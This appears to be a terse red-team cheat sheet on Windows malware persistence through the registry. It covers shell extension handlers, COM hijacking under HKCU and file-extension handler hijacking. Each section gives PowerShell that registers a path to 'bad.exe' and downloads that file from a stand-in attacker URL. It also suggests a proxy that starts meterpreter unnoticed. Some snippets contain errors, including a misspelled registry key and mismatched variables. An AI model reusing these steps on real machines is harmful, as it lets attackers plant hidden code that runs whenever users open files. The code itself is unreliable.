This is about … .
Windows
Shell Extension Handlers
Computer\HKCU\Software\Classes\*\shellex\ContextMenuHandlers. Same under HKLM. ⚠️ No need to provide admin creds to add a value here, to HKCU only. GUID here is the same as listed in CLSID subkey. To add a malicious extension one needs to create a unique GUID, add a subkey to CLSID, add a path to dll, and then add a shell extension in the registry above using the same GUID. Use 🛠 OLE/COM object Viewer to see all COM objects registered. Simply clicking an image or a archive file may trigger a malicious act.
$Path="HKCU:\Software\Classes\*\shellex\ContectMenuHandlers\BadExt"
$Name="(Default)"
$Value="{GUID}"
New-Item -Path $Path -Force
New-ItemProperty -Path $Path -Name $Name -Value $Value
$Path1="HKCU:\Software\Classes\CLSID\{GUID}\InprocServer32" # example
$Name1="(Default)"
$Value1="C:\\tmp\bad.exe"
New-Item -Path $Path1 -Force
New-ItemProperty -Path $Path1 -Name $Name1 -Value $Value1
$Url="https://attackersurl/bad.exe"
$Out="C:\\tmp\\bad.exe"
Invoke-WebRequest -Uri $Url -Outfile $Out
COM Hijack
In Process Monitor filter: Path contains CLSID and Result is NAME NOT FOUND. The entry exists in HKLM\Software\Classes\CLSID\{GUID}, but doesn’t exist at HKCU\Software\Classes\CLSID\{GUID}. It looks for the entry in HKCU first, if not found, in HKLM. That’s where we can add an entry under HKCU. Powershell needs to be used, since it’s a trusted application for registry.
$Path1="HKCU:\Software\Classes\CLSID\{GUID}\InprocServer32" # example
$Name1="(Default)"
$Value1="C:\\tmp\bad.exe"
New-Item -Path $Path -Force
New-ItemProperty -Path $Path -Name $Name -Value $Value
$Url="https://attackersurl/bad.exe"
$Out="C:\\tmp\\bad.exe"
Invoke-WebRequest -Uri $Url -Outfile $Out
Extension Handler Hijacking
Computer\HKCR\, subkeys Open and Command. An attackere can’t change HKCR or HKLM, but can change HKCU and HKU without admin privileges. Using a proxy within Command will help remain low: proxy.exe "{path/to/real/app}" (starts the meterpreter, for example, then launches the real appliation). ⚠️ Powershell is not necessary, HKU hive can be edited without it.
New-PSDrive -PSProvider Registry -Name HKU -Root HKEY_USERS
$Path="HKU:\{SID}_Classes\VLC.mp4\shell\Open\Command"
$Name="(Default)"
$Value="C:\\tmp\\bad.exe"
New-Item -Path $Path -Force
New-ItemProperty -Path $Path -Name $Name -Value $Value
$Url="https://attackersurl/bad.exe"
$Out="C:\\tmp\\bad.exe"
Invoke-WebRequest -Uri $Url -Outfile $Out
Read more about the above techniques: Wipe the drive! Stealthy Malware Persistence - Part 1 and Wipe the drive! Stealthy Malware Persistence - Part 2.